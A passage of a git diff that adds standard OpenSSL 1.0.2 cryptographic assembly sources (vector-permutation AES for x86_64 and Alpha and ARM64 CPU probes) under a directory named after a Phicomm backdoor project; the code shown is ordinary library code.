+	pshufb  %xmm1, 	%xmm3		# 3 = 1/i
+	pxor	%xmm2, 	%xmm3		# 3 = iak = 1/i + a/k
+	movdqa	%xmm10,	%xmm4		# 4 : 1/j
+	pshufb	%xmm0, 	%xmm4		# 4 = 1/j
+	pxor	%xmm2, 	%xmm4		# 4 = jak = 1/j + a/k
+	movdqa	%xmm10,	%xmm2		# 2 : 1/iak
+	pshufb  %xmm3,	%xmm2		# 2 = 1/iak
+	pxor	%xmm0, 	%xmm2		# 2 = io
+	movdqa	%xmm10, %xmm3		# 3 : 1/jak
+	pshufb  %xmm4,  %xmm3		# 3 = 1/jak
+	pxor	%xmm1,  %xmm3		# 3 = jo
+	movdqa	%xmm13, %xmm4		# 4 : sbou
+	pshufb  %xmm2,  %xmm4		# 4 = sbou
+	movdqa	%xmm12, %xmm0		# 0 : sbot
+	pshufb  %xmm3,	%xmm0		# 0 = sb1t
+	pxor	%xmm4, 	%xmm0		# 0 = sbox output
+
+	# add in smeared stuff
+	pxor	%xmm7,	%xmm0	
+	movdqa	%xmm0,	%xmm7
+	ret
+.size	_vpaes_schedule_round,.-_vpaes_schedule_round
+
+##
+##  .aes_schedule_transform
+##
+##  Linear-transform %xmm0 according to tables at (%r11)
+##
+##  Requires that %xmm9 = 0x0F0F... as in preheat
+##  Output in %xmm0
+##  Clobbers %xmm1, %xmm2
+##
+.type	_vpaes_schedule_transform,\@abi-omnipotent
+.align	16
+_vpaes_schedule_transform:
+	movdqa	%xmm9,	%xmm1
+	pandn	%xmm0,	%xmm1
+	psrld	\$4,	%xmm1
+	pand	%xmm9,	%xmm0
+	movdqa	(%r11), %xmm2 	# lo
+	pshufb	%xmm0,	%xmm2
+	movdqa	16(%r11), %xmm0 # hi
+	pshufb	%xmm1,	%xmm0
+	pxor	%xmm2,	%xmm0
+	ret
+.size	_vpaes_schedule_transform,.-_vpaes_schedule_transform
+
+##
+##  .aes_schedule_mangle
+##
+##  Mangle xmm0 from (basis-transformed) standard version
+##  to our version.
+##
+##  On encrypt,
+##    xor with 0x63
+##    multiply by circulant 0,1,1,1
+##    apply shiftrows transform
+##
+##  On decrypt,
+##    xor with 0x63
+##    multiply by "inverse mixcolumns" circulant E,B,D,9
+##    deskew
+##    apply shiftrows transform
+##
+##
+##  Writes out to (%rdx), and increments or decrements it
+##  Keeps track of round number mod 4 in %r8
+##  Preserves xmm0
+##  Clobbers xmm1-xmm5
+##
+.type	_vpaes_schedule_mangle,\@abi-omnipotent
+.align	16
+_vpaes_schedule_mangle:
+	movdqa	%xmm0,	%xmm4	# save xmm0 for later
+	movdqa	.Lk_mc_forward(%rip),%xmm5
+	test	%rcx, 	%rcx
+	jnz	.Lschedule_mangle_dec
+
+	# encrypting
+	add	\$16,	%rdx
+	pxor	.Lk_s63(%rip),%xmm4
+	pshufb	%xmm5,	%xmm4
+	movdqa	%xmm4,	%xmm3
+	pshufb	%xmm5,	%xmm4
+	pxor	%xmm4,	%xmm3
+	pshufb	%xmm5,	%xmm4
+	pxor	%xmm4,	%xmm3
+
+	jmp	.Lschedule_mangle_both
+.align	16
+.Lschedule_mangle_dec:
+	# inverse mix columns
+	lea	.Lk_dksd(%rip),%r11
+	movdqa	%xmm9,	%xmm1
+	pandn	%xmm4,	%xmm1
+	psrld	\$4,	%xmm1	# 1 = hi
+	pand	%xmm9,	%xmm4	# 4 = lo
+
+	movdqa	0x00(%r11), %xmm2
+	pshufb	%xmm4,	%xmm2
+	movdqa	0x10(%r11), %xmm3
+	pshufb	%xmm1,	%xmm3
+	pxor	%xmm2,	%xmm3
+	pshufb	%xmm5,	%xmm3
+
+	movdqa	0x20(%r11), %xmm2
+	pshufb	%xmm4,	%xmm2
+	pxor	%xmm3,	%xmm2
+	movdqa	0x30(%r11), %xmm3
+	pshufb	%xmm1,	%xmm3
+	pxor	%xmm2,	%xmm3
+	pshufb	%xmm5,	%xmm3
+
+	movdqa	0x40(%r11), %xmm2
+	pshufb	%xmm4,	%xmm2
+	pxor	%xmm3,	%xmm2
+	movdqa	0x50(%r11), %xmm3
+	pshufb	%xmm1,	%xmm3
+	pxor	%xmm2,	%xmm3
+	pshufb	%xmm5,	%xmm3
+
+	movdqa	0x60(%r11), %xmm2
+	pshufb	%xmm4,	%xmm2
+	pxor	%xmm3,	%xmm2
+	movdqa	0x70(%r11), %xmm3
+	pshufb	%xmm1,	%xmm3
+	pxor	%xmm2,	%xmm3
+
+	add	\$-16,	%rdx
+
+.Lschedule_mangle_both:
+	movdqa	(%r8,%r10),%xmm1
+	pshufb	%xmm1,%xmm3
+	add	\$-16,	%r8
+	and	\$0x30,	%r8
+	movdqu	%xmm3,	(%rdx)
+	ret
+.size	_vpaes_schedule_mangle,.-_vpaes_schedule_mangle
+
+#
+# Interface to OpenSSL
+#
+.globl	${PREFIX}_set_encrypt_key
+.type	${PREFIX}_set_encrypt_key,\@function,3
+.align	16
+${PREFIX}_set_encrypt_key:
+___
+$code.=<<___ if ($win64);
+	lea	-0xb8(%rsp),%rsp
+	movaps	%xmm6,0x10(%rsp)
+	movaps	%xmm7,0x20(%rsp)
+	movaps	%xmm8,0x30(%rsp)
+	movaps	%xmm9,0x40(%rsp)
+	movaps	%xmm10,0x50(%rsp)
+	movaps	%xmm11,0x60(%rsp)
+	movaps	%xmm12,0x70(%rsp)
+	movaps	%xmm13,0x80(%rsp)
+	movaps	%xmm14,0x90(%rsp)
+	movaps	%xmm15,0xa0(%rsp)
+.Lenc_key_body:
+___
+$code.=<<___;
+	mov	%esi,%eax
+	shr	\$5,%eax
+	add	\$5,%eax
+	mov	%eax,240(%rdx)	# AES_KEY->rounds = nbits/32+5;
+
+	mov	\$0,%ecx
+	mov	\$0x30,%r8d
+	call	_vpaes_schedule_core
+___
+$code.=<<___ if ($win64);
+	movaps	0x10(%rsp),%xmm6
+	movaps	0x20(%rsp),%xmm7
+	movaps	0x30(%rsp),%xmm8
+	movaps	0x40(%rsp),%xmm9
+	movaps	0x50(%rsp),%xmm10
+	movaps	0x60(%rsp),%xmm11
+	movaps	0x70(%rsp),%xmm12
+	movaps	0x80(%rsp),%xmm13
+	movaps	0x90(%rsp),%xmm14
+	movaps	0xa0(%rsp),%xmm15
+	lea	0xb8(%rsp),%rsp
+.Lenc_key_epilogue:
+___
+$code.=<<___;
+	xor	%eax,%eax
+	ret
+.size	${PREFIX}_set_encrypt_key,.-${PREFIX}_set_encrypt_key
+
+.globl	${PREFIX}_set_decrypt_key
+.type	${PREFIX}_set_decrypt_key,\@function,3
+.align	16
+${PREFIX}_set_decrypt_key:
+___
+$code.=<<___ if ($win64);
+	lea	-0xb8(%rsp),%rsp
+	movaps	%xmm6,0x10(%rsp)
+	movaps	%xmm7,0x20(%rsp)
+	movaps	%xmm8,0x30(%rsp)
+	movaps	%xmm9,0x40(%rsp)
+	movaps	%xmm10,0x50(%rsp)
+	movaps	%xmm11,0x60(%rsp)
+	movaps	%xmm12,0x70(%rsp)
+	movaps	%xmm13,0x80(%rsp)
+	movaps	%xmm14,0x90(%rsp)
+	movaps	%xmm15,0xa0(%rsp)
+.Ldec_key_body:
+___
+$code.=<<___;
+	mov	%esi,%eax
+	shr	\$5,%eax
+	add	\$5,%eax
+	mov	%eax,240(%rdx)	# AES_KEY->rounds = nbits/32+5;
+	shl	\$4,%eax
+	lea	16(%rdx,%rax),%rdx
+
+	mov	\$1,%ecx
+	mov	%esi,%r8d
+	shr	\$1,%r8d
+	and	\$32,%r8d
+	xor	\$32,%r8d	# nbits==192?0:32
+	call	_vpaes_schedule_core
+___
+$code.=<<___ if ($win64);
+	movaps	0x10(%rsp),%xmm6
+	movaps	0x20(%rsp),%xmm7
+	movaps	0x30(%rsp),%xmm8
+	movaps	0x40(%rsp),%xmm9
+	movaps	0x50(%rsp),%xmm10
+	movaps	0x60(%rsp),%xmm11
+	movaps	0x70(%rsp),%xmm12
+	movaps	0x80(%rsp),%xmm13
+	movaps	0x90(%rsp),%xmm14
+	movaps	0xa0(%rsp),%xmm15
+	lea	0xb8(%rsp),%rsp
+.Ldec_key_epilogue:
+___
+$code.=<<___;
+	xor	%eax,%eax
+	ret
+.size	${PREFIX}_set_decrypt_key,.-${PREFIX}_set_decrypt_key
+
+.globl	${PREFIX}_encrypt
+.type	${PREFIX}_encrypt,\@function,3
+.align	16
+${PREFIX}_encrypt:
+___
+$code.=<<___ if ($win64);
+	lea	-0xb8(%rsp),%rsp
+	movaps	%xmm6,0x10(%rsp)
+	movaps	%xmm7,0x20(%rsp)
+	movaps	%xmm8,0x30(%rsp)
+	movaps	%xmm9,0x40(%rsp)
+	movaps	%xmm10,0x50(%rsp)
+	movaps	%xmm11,0x60(%rsp)
+	movaps	%xmm12,0x70(%rsp)
+	movaps	%xmm13,0x80(%rsp)
+	movaps	%xmm14,0x90(%rsp)
+	movaps	%xmm15,0xa0(%rsp)
+.Lenc_body:
+___
+$code.=<<___;
+	movdqu	(%rdi),%xmm0
+	call	_vpaes_preheat
+	call	_vpaes_encrypt_core
+	movdqu	%xmm0,(%rsi)
+___
+$code.=<<___ if ($win64);
+	movaps	0x10(%rsp),%xmm6
+	movaps	0x20(%rsp),%xmm7
+	movaps	0x30(%rsp),%xmm8
+	movaps	0x40(%rsp),%xmm9
+	movaps	0x50(%rsp),%xmm10
+	movaps	0x60(%rsp),%xmm11
+	movaps	0x70(%rsp),%xmm12
+	movaps	0x80(%rsp),%xmm13
+	movaps	0x90(%rsp),%xmm14
+	movaps	0xa0(%rsp),%xmm15
+	lea	0xb8(%rsp),%rsp
+.Lenc_epilogue:
+___
+$code.=<<___;
+	ret
+.size	${PREFIX}_encrypt,.-${PREFIX}_encrypt
+
+.globl	${PREFIX}_decrypt
+.type	${PREFIX}_decrypt,\@function,3
+.align	16
+${PREFIX}_decrypt:
+___
+$code.=<<___ if ($win64);
+	lea	-0xb8(%rsp),%rsp
+	movaps	%xmm6,0x10(%rsp)
+	movaps	%xmm7,0x20(%rsp)
+	movaps	%xmm8,0x30(%rsp)
+	movaps	%xmm9,0x40(%rsp)
+	movaps	%xmm10,0x50(%rsp)
+	movaps	%xmm11,0x60(%rsp)
+	movaps	%xmm12,0x70(%rsp)
+	movaps	%xmm13,0x80(%rsp)
+	movaps	%xmm14,0x90(%rsp)
+	movaps	%xmm15,0xa0(%rsp)
+.Ldec_body:
+___
+$code.=<<___;
+	movdqu	(%rdi),%xmm0
+	call	_vpaes_preheat
+	call	_vpaes_decrypt_core
+	movdqu	%xmm0,(%rsi)
+___
+$code.=<<___ if ($win64);
+	movaps	0x10(%rsp),%xmm6
+	movaps	0x20(%rsp),%xmm7
+	movaps	0x30(%rsp),%xmm8
+	movaps	0x40(%rsp),%xmm9
+	movaps	0x50(%rsp),%xmm10
+	movaps	0x60(%rsp),%xmm11
+	movaps	0x70(%rsp),%xmm12
+	movaps	0x80(%rsp),%xmm13
+	movaps	0x90(%rsp),%xmm14
+	movaps	0xa0(%rsp),%xmm15
+	lea	0xb8(%rsp),%rsp
+.Ldec_epilogue:
+___
+$code.=<<___;
+	ret
+.size	${PREFIX}_decrypt,.-${PREFIX}_decrypt
+___
+{
+my ($inp,$out,$len,$key,$ivp,$enc)=("%rdi","%rsi","%rdx","%rcx","%r8","%r9");
+# void AES_cbc_encrypt (const void char *inp, unsigned char *out,
+#                       size_t length, const AES_KEY *key,
+#                       unsigned char *ivp,const int enc);
+$code.=<<___;
+.globl	${PREFIX}_cbc_encrypt
+.type	${PREFIX}_cbc_encrypt,\@function,6
+.align	16
+${PREFIX}_cbc_encrypt:
+	xchg	$key,$len
+___
+($len,$key)=($key,$len);
+$code.=<<___;
+	sub	\$16,$len
+	jc	.Lcbc_abort
+___
+$code.=<<___ if ($win64);
+	lea	-0xb8(%rsp),%rsp
+	movaps	%xmm6,0x10(%rsp)
+	movaps	%xmm7,0x20(%rsp)
+	movaps	%xmm8,0x30(%rsp)
+	movaps	%xmm9,0x40(%rsp)
+	movaps	%xmm10,0x50(%rsp)
+	movaps	%xmm11,0x60(%rsp)
+	movaps	%xmm12,0x70(%rsp)
+	movaps	%xmm13,0x80(%rsp)
+	movaps	%xmm14,0x90(%rsp)
+	movaps	%xmm15,0xa0(%rsp)
+.Lcbc_body:
+___
+$code.=<<___;
+	movdqu	($ivp),%xmm6		# load IV
+	sub	$inp,$out
+	call	_vpaes_preheat
+	cmp	\$0,${enc}d
+	je	.Lcbc_dec_loop
+	jmp	.Lcbc_enc_loop
+.align	16
+.Lcbc_enc_loop:
+	movdqu	($inp),%xmm0
+	pxor	%xmm6,%xmm0
+	call	_vpaes_encrypt_core
+	movdqa	%xmm0,%xmm6
+	movdqu	%xmm0,($out,$inp)
+	lea	16($inp),$inp
+	sub	\$16,$len
+	jnc	.Lcbc_enc_loop
+	jmp	.Lcbc_done
+.align	16
+.Lcbc_dec_loop:
+	movdqu	($inp),%xmm0
+	movdqa	%xmm0,%xmm7
+	call	_vpaes_decrypt_core
+	pxor	%xmm6,%xmm0
+	movdqa	%xmm7,%xmm6
+	movdqu	%xmm0,($out,$inp)
+	lea	16($inp),$inp
+	sub	\$16,$len
+	jnc	.Lcbc_dec_loop
+.Lcbc_done:
+	movdqu	%xmm6,($ivp)		# save IV
+___
+$code.=<<___ if ($win64);
+	movaps	0x10(%rsp),%xmm6
+	movaps	0x20(%rsp),%xmm7
+	movaps	0x30(%rsp),%xmm8
+	movaps	0x40(%rsp),%xmm9
+	movaps	0x50(%rsp),%xmm10
+	movaps	0x60(%rsp),%xmm11
+	movaps	0x70(%rsp),%xmm12
+	movaps	0x80(%rsp),%xmm13
+	movaps	0x90(%rsp),%xmm14
+	movaps	0xa0(%rsp),%xmm15
+	lea	0xb8(%rsp),%rsp
+.Lcbc_epilogue:
+___
+$code.=<<___;
+.Lcbc_abort:
+	ret
+.size	${PREFIX}_cbc_encrypt,.-${PREFIX}_cbc_encrypt
+___
+}
+$code.=<<___;
+##
+##  _aes_preheat
+##
+##  Fills register %r10 -> .aes_consts (so you can -fPIC)
+##  and %xmm9-%xmm15 as specified below.
+##
+.type	_vpaes_preheat,\@abi-omnipotent
+.align	16
+_vpaes_preheat:
+	lea	.Lk_s0F(%rip), %r10
+	movdqa	-0x20(%r10), %xmm10	# .Lk_inv
+	movdqa	-0x10(%r10), %xmm11	# .Lk_inv+16
+	movdqa	0x00(%r10), %xmm9	# .Lk_s0F
+	movdqa	0x30(%r10), %xmm13	# .Lk_sb1
+	movdqa	0x40(%r10), %xmm12	# .Lk_sb1+16
+	movdqa	0x50(%r10), %xmm15	# .Lk_sb2
+	movdqa	0x60(%r10), %xmm14	# .Lk_sb2+16
+	ret
+.size	_vpaes_preheat,.-_vpaes_preheat
+########################################################
+##                                                    ##
+##                     Constants                      ##
+##                                                    ##
+########################################################
+.type	_vpaes_consts,\@object
+.align	64
+_vpaes_consts:
+.Lk_inv:	# inv, inva
+	.quad	0x0E05060F0D080180, 0x040703090A0B0C02
+	.quad	0x01040A060F0B0780, 0x030D0E0C02050809
+
+.Lk_s0F:	# s0F
+	.quad	0x0F0F0F0F0F0F0F0F, 0x0F0F0F0F0F0F0F0F
+
+.Lk_ipt:	# input transform (lo, hi)
+	.quad	0xC2B2E8985A2A7000, 0xCABAE09052227808
+	.quad	0x4C01307D317C4D00, 0xCD80B1FCB0FDCC81
+
+.Lk_sb1:	# sb1u, sb1t
+	.quad	0xB19BE18FCB503E00, 0xA5DF7A6E142AF544
+	.quad	0x3618D415FAE22300, 0x3BF7CCC10D2ED9EF
+.Lk_sb2:	# sb2u, sb2t
+	.quad	0xE27A93C60B712400, 0x5EB7E955BC982FCD
+	.quad	0x69EB88400AE12900, 0xC2A163C8AB82234A
+.Lk_sbo:	# sbou, sbot
+	.quad	0xD0D26D176FBDC700, 0x15AABF7AC502A878
+	.quad	0xCFE474A55FBB6A00, 0x8E1E90D1412B35FA
+
+.Lk_mc_forward:	# mc_forward
+	.quad	0x0407060500030201, 0x0C0F0E0D080B0A09
+	.quad	0x080B0A0904070605, 0x000302010C0F0E0D
+	.quad	0x0C0F0E0D080B0A09, 0x0407060500030201
+	.quad	0x000302010C0F0E0D, 0x080B0A0904070605
+
+.Lk_mc_backward:# mc_backward
+	.quad	0x0605040702010003, 0x0E0D0C0F0A09080B
+	.quad	0x020100030E0D0C0F, 0x0A09080B06050407
+	.quad	0x0E0D0C0F0A09080B, 0x0605040702010003
+	.quad	0x0A09080B06050407, 0x020100030E0D0C0F
+
+.Lk_sr:		# sr
+	.quad	0x0706050403020100, 0x0F0E0D0C0B0A0908
+	.quad	0x030E09040F0A0500, 0x0B06010C07020D08
+	.quad	0x0F060D040B020900, 0x070E050C030A0108
+	.quad	0x0B0E0104070A0D00, 0x0306090C0F020508
+
+.Lk_rcon:	# rcon
+	.quad	0x1F8391B9AF9DEEB6, 0x702A98084D7C7D81
+
+.Lk_s63:	# s63: all equal to 0x63 transformed
+	.quad	0x5B5B5B5B5B5B5B5B, 0x5B5B5B5B5B5B5B5B
+
+.Lk_opt:	# output transform
+	.quad	0xFF9F4929D6B66000, 0xF7974121DEBE6808
+	.quad	0x01EDBD5150BCEC00, 0xE10D5DB1B05C0CE0
+
+.Lk_deskew:	# deskew tables: inverts the sbox's "skew"
+	.quad	0x07E4A34047A4E300, 0x1DFEB95A5DBEF91A
+	.quad	0x5F36B5DC83EA6900, 0x2841C2ABF49D1E77
+
+##
+##  Decryption stuff
+##  Key schedule constants
+##
+.Lk_dksd:	# decryption key schedule: invskew x*D
+	.quad	0xFEB91A5DA3E44700, 0x0740E3A45A1DBEF9
+	.quad	0x41C277F4B5368300, 0x5FDC69EAAB289D1E
+.Lk_dksb:	# decryption key schedule: invskew x*B
+	.quad	0x9A4FCA1F8550D500, 0x03D653861CC94C99
+	.quad	0x115BEDA7B6FC4A00, 0xD993256F7E3482C8
+.Lk_dkse:	# decryption key schedule: invskew x*E + 0x63
+	.quad	0xD5031CCA1FC9D600, 0x53859A4C994F5086
+	.quad	0xA23196054FDC7BE8, 0xCD5EF96A20B31487
+.Lk_dks9:	# decryption key schedule: invskew x*9
+	.quad	0xB6116FC87ED9A700, 0x4AED933482255BFC
+	.quad	0x4576516227143300, 0x8BB89FACE9DAFDCE
+
+##
+##  Decryption stuff
+##  Round function constants
+##
+.Lk_dipt:	# decryption input transform
+	.quad	0x0F505B040B545F00, 0x154A411E114E451A
+	.quad	0x86E383E660056500, 0x12771772F491F194
+
+.Lk_dsb9:	# decryption sbox output *9*u, *9*t
+	.quad	0x851C03539A86D600, 0xCAD51F504F994CC9
+	.quad	0xC03B1789ECD74900, 0x725E2C9EB2FBA565
+.Lk_dsbd:	# decryption sbox output *D*u, *D*t
+	.quad	0x7D57CCDFE6B1A200, 0xF56E9B13882A4439
+	.quad	0x3CE2FAF724C6CB00, 0x2931180D15DEEFD3
+.Lk_dsbb:	# decryption sbox output *B*u, *B*t
+	.quad	0xD022649296B44200, 0x602646F6B0F2D404
+	.quad	0xC19498A6CD596700, 0xF3FF0C3E3255AA6B
+.Lk_dsbe:	# decryption sbox output *E*u, *E*t
+	.quad	0x46F2929626D4D000, 0x2242600464B4F6B0
+	.quad	0x0C55A6CDFFAAC100, 0x9467F36B98593E32
+.Lk_dsbo:	# decryption sbox final output
+	.quad	0x1387EA537EF94000, 0xC7AA6DB9D4943E2D
+	.quad	0x12D7560F93441D00, 0xCA4B8159D8C58E9C
+.asciz	"Vector Permutation AES for x86_64/SSSE3, Mike Hamburg (Stanford University)"
+.align	64
+.size	_vpaes_consts,.-_vpaes_consts
+___
+
+if ($win64) {
+# EXCEPTION_DISPOSITION handler (EXCEPTION_RECORD *rec,ULONG64 frame,
+#		CONTEXT *context,DISPATCHER_CONTEXT *disp)
+$rec="%rcx";
+$frame="%rdx";
+$context="%r8";
+$disp="%r9";
+
+$code.=<<___;
+.extern	__imp_RtlVirtualUnwind
+.type	se_handler,\@abi-omnipotent
+.align	16
+se_handler:
+	push	%rsi
+	push	%rdi
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+	pushfq
+	sub	\$64,%rsp
+
+	mov	120($context),%rax	# pull context->Rax
+	mov	248($context),%rbx	# pull context->Rip
+
+	mov	8($disp),%rsi		# disp->ImageBase
+	mov	56($disp),%r11		# disp->HandlerData
+
+	mov	0(%r11),%r10d		# HandlerData[0]
+	lea	(%rsi,%r10),%r10	# prologue label
+	cmp	%r10,%rbx		# context->Rip<prologue label
+	jb	.Lin_prologue
+
+	mov	152($context),%rax	# pull context->Rsp
+
+	mov	4(%r11),%r10d		# HandlerData[1]
+	lea	(%rsi,%r10),%r10	# epilogue label
+	cmp	%r10,%rbx		# context->Rip>=epilogue label
+	jae	.Lin_prologue
+
+	lea	16(%rax),%rsi		# %xmm save area
+	lea	512($context),%rdi	# &context.Xmm6
+	mov	\$20,%ecx		# 10*sizeof(%xmm0)/sizeof(%rax)
+	.long	0xa548f3fc		# cld; rep movsq
+	lea	0xb8(%rax),%rax		# adjust stack pointer
+
+.Lin_prologue:
+	mov	8(%rax),%rdi
+	mov	16(%rax),%rsi
+	mov	%rax,152($context)	# restore context->Rsp
+	mov	%rsi,168($context)	# restore context->Rsi
+	mov	%rdi,176($context)	# restore context->Rdi
+
+	mov	40($disp),%rdi		# disp->ContextRecord
+	mov	$context,%rsi		# context
+	mov	\$`1232/8`,%ecx		# sizeof(CONTEXT)
+	.long	0xa548f3fc		# cld; rep movsq
+
+	mov	$disp,%rsi
+	xor	%rcx,%rcx		# arg1, UNW_FLAG_NHANDLER
+	mov	8(%rsi),%rdx		# arg2, disp->ImageBase
+	mov	0(%rsi),%r8		# arg3, disp->ControlPc
+	mov	16(%rsi),%r9		# arg4, disp->FunctionEntry
+	mov	40(%rsi),%r10		# disp->ContextRecord
+	lea	56(%rsi),%r11		# &disp->HandlerData
+	lea	24(%rsi),%r12		# &disp->EstablisherFrame
+	mov	%r10,32(%rsp)		# arg5
+	mov	%r11,40(%rsp)		# arg6
+	mov	%r12,48(%rsp)		# arg7
+	mov	%rcx,56(%rsp)		# arg8, (NULL)
+	call	*__imp_RtlVirtualUnwind(%rip)
+
+	mov	\$1,%eax		# ExceptionContinueSearch
+	add	\$64,%rsp
+	popfq
+	pop	%r15
+	pop	%r14
+	pop	%r13
+	pop	%r12
+	pop	%rbp
+	pop	%rbx
+	pop	%rdi
+	pop	%rsi
+	ret
+.size	se_handler,.-se_handler
+
+.section	.pdata
+.align	4
+	.rva	.LSEH_begin_${PREFIX}_set_encrypt_key
+	.rva	.LSEH_end_${PREFIX}_set_encrypt_key
+	.rva	.LSEH_info_${PREFIX}_set_encrypt_key
+
+	.rva	.LSEH_begin_${PREFIX}_set_decrypt_key
+	.rva	.LSEH_end_${PREFIX}_set_decrypt_key
+	.rva	.LSEH_info_${PREFIX}_set_decrypt_key
+
+	.rva	.LSEH_begin_${PREFIX}_encrypt
+	.rva	.LSEH_end_${PREFIX}_encrypt
+	.rva	.LSEH_info_${PREFIX}_encrypt
+
+	.rva	.LSEH_begin_${PREFIX}_decrypt
+	.rva	.LSEH_end_${PREFIX}_decrypt
+	.rva	.LSEH_info_${PREFIX}_decrypt
+
+	.rva	.LSEH_begin_${PREFIX}_cbc_encrypt
+	.rva	.LSEH_end_${PREFIX}_cbc_encrypt
+	.rva	.LSEH_info_${PREFIX}_cbc_encrypt
+
+.section	.xdata
+.align	8
+.LSEH_info_${PREFIX}_set_encrypt_key:
+	.byte	9,0,0,0
+	.rva	se_handler
+	.rva	.Lenc_key_body,.Lenc_key_epilogue	# HandlerData[]
+.LSEH_info_${PREFIX}_set_decrypt_key:
+	.byte	9,0,0,0
+	.rva	se_handler
+	.rva	.Ldec_key_body,.Ldec_key_epilogue	# HandlerData[]
+.LSEH_info_${PREFIX}_encrypt:
+	.byte	9,0,0,0
+	.rva	se_handler
+	.rva	.Lenc_body,.Lenc_epilogue		# HandlerData[]
+.LSEH_info_${PREFIX}_decrypt:
+	.byte	9,0,0,0
+	.rva	se_handler
+	.rva	.Ldec_body,.Ldec_epilogue		# HandlerData[]
+.LSEH_info_${PREFIX}_cbc_encrypt:
+	.byte	9,0,0,0
+	.rva	se_handler
+	.rva	.Lcbc_body,.Lcbc_epilogue		# HandlerData[]
+___
+}
+
+$code =~ s/\`([^\`]*)\`/eval($1)/gem;
+
+print $code;
+
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/lib b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/lib
new file mode 100644
index 0000000..e69de29
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/alphacpuid.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/alphacpuid.pl
new file mode 100644
index 0000000..4b3cbb9
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/alphacpuid.pl
@@ -0,0 +1,126 @@
+#!/usr/bin/env perl
+print <<'___';
+.text
+
+.set	noat
+
+.globl	OPENSSL_cpuid_setup
+.ent	OPENSSL_cpuid_setup
+OPENSSL_cpuid_setup:
+	.frame	$30,0,$26
+	.prologue 0
+	ret	($26)
+.end	OPENSSL_cpuid_setup
+
+.globl	OPENSSL_wipe_cpu
+.ent	OPENSSL_wipe_cpu
+OPENSSL_wipe_cpu:
+	.frame	$30,0,$26
+	.prologue 0
+	clr	$1
+	clr	$2
+	clr	$3
+	clr	$4
+	clr	$5
+	clr	$6
+	clr	$7
+	clr	$8
+	clr	$16
+	clr	$17
+	clr	$18
+	clr	$19
+	clr	$20
+	clr	$21
+	clr	$22
+	clr	$23
+	clr	$24
+	clr	$25
+	clr	$27
+	clr	$at
+	clr	$29
+	fclr	$f0
+	fclr	$f1
+	fclr	$f10
+	fclr	$f11
+	fclr	$f12
+	fclr	$f13
+	fclr	$f14
+	fclr	$f15
+	fclr	$f16
+	fclr	$f17
+	fclr	$f18
+	fclr	$f19
+	fclr	$f20
+	fclr	$f21
+	fclr	$f22
+	fclr	$f23
+	fclr	$f24
+	fclr	$f25
+	fclr	$f26
+	fclr	$f27
+	fclr	$f28
+	fclr	$f29
+	fclr	$f30
+	mov	$sp,$0
+	ret	($26)
+.end	OPENSSL_wipe_cpu
+
+.globl	OPENSSL_atomic_add
+.ent	OPENSSL_atomic_add
+OPENSSL_atomic_add:
+	.frame	$30,0,$26
+	.prologue 0
+1:	ldl_l	$0,0($16)
+	addl	$0,$17,$1
+	stl_c	$1,0($16)
+	beq	$1,1b
+	addl	$0,$17,$0
+	ret	($26)
+.end	OPENSSL_atomic_add
+
+.globl	OPENSSL_rdtsc
+.ent	OPENSSL_rdtsc
+OPENSSL_rdtsc:
+	.frame	$30,0,$26
+	.prologue 0
+	rpcc	$0
+	ret	($26)
+.end	OPENSSL_rdtsc
+
+.globl	OPENSSL_cleanse
+.ent	OPENSSL_cleanse
+OPENSSL_cleanse:
+	.frame	$30,0,$26
+	.prologue 0
+	beq	$17,.Ldone
+	and	$16,7,$0
+	bic	$17,7,$at
+	beq	$at,.Little
+	beq	$0,.Laligned
+
+.Little:
+	subq	$0,8,$0
+	ldq_u	$1,0($16)
+	mov	$16,$2
+.Lalign:
+	mskbl	$1,$16,$1
+	lda	$16,1($16)
+	subq	$17,1,$17
+	addq	$0,1,$0
+	beq	$17,.Lout
+	bne	$0,.Lalign
+.Lout:	stq_u	$1,0($2)
+	beq	$17,.Ldone
+	bic	$17,7,$at
+	beq	$at,.Little
+
+.Laligned:
+	stq	$31,0($16)
+	subq	$17,8,$17
+	lda	$16,8($16)
+	bic	$17,7,$at
+	bne	$at,.Laligned
+	bne	$17,.Little
+.Ldone: ret	($26)
+.end	OPENSSL_cleanse
+___
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/arm64cpuid.S b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/arm64cpuid.S
new file mode 100644
index 0000000..4778ac1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/arm64cpuid.S
@@ -0,0 +1,46 @@
+#include "arm_arch.h"
+
+.text
+.arch	armv8-a+crypto
+
+.align	5
+.global	_armv7_neon_probe
+.type	_armv7_neon_probe,%function
+_armv7_neon_probe:
+	orr	v15.16b, v15.16b, v15.16b
+	ret
+.size	_armv7_neon_probe,.-_armv7_neon_probe
+
+.global	_armv7_tick
+.type	_armv7_tick,%function
+_armv7_tick:
+	mrs	x0, CNTVCT_EL0
+	ret
+.size	_armv7_tick,.-_armv7_tick
+
+.global	_armv8_aes_probe
+.type	_armv8_aes_probe,%function
+_armv8_aes_probe:
+	aese	v0.16b, v0.16b
+	ret
+.size	_armv8_aes_probe,.-_armv8_aes_probe
+
+.global	_armv8_sha1_probe
+.type	_armv8_sha1_probe,%function
+_armv8_sha1_probe:
+	sha1h	s0, s0
+	ret
+.size	_armv8_sha1_probe,.-_armv8_sha1_probe
+
+.global	_armv8_sha256_probe
+.type	_armv8_sha256_probe,%function
+_armv8_sha256_probe:
+	sha256su0	v0.4s, v0.4s
+	ret
+.size	_armv8_sha256_probe,.-_armv8_sha256_probe
+.global	_armv8_pmull_probe
+.type	_armv8_pmull_probe,%function
+_armv8_pmull_probe:
+	pmull	v0.1q, v0.1d, v0.1d
+	ret
+.size	_armv8_pmull_probe,.-_armv8_pmull_probe
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/arm_arch.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/arm_arch.h
new file mode 100644
index 0000000..9d6e588
--- /dev/null
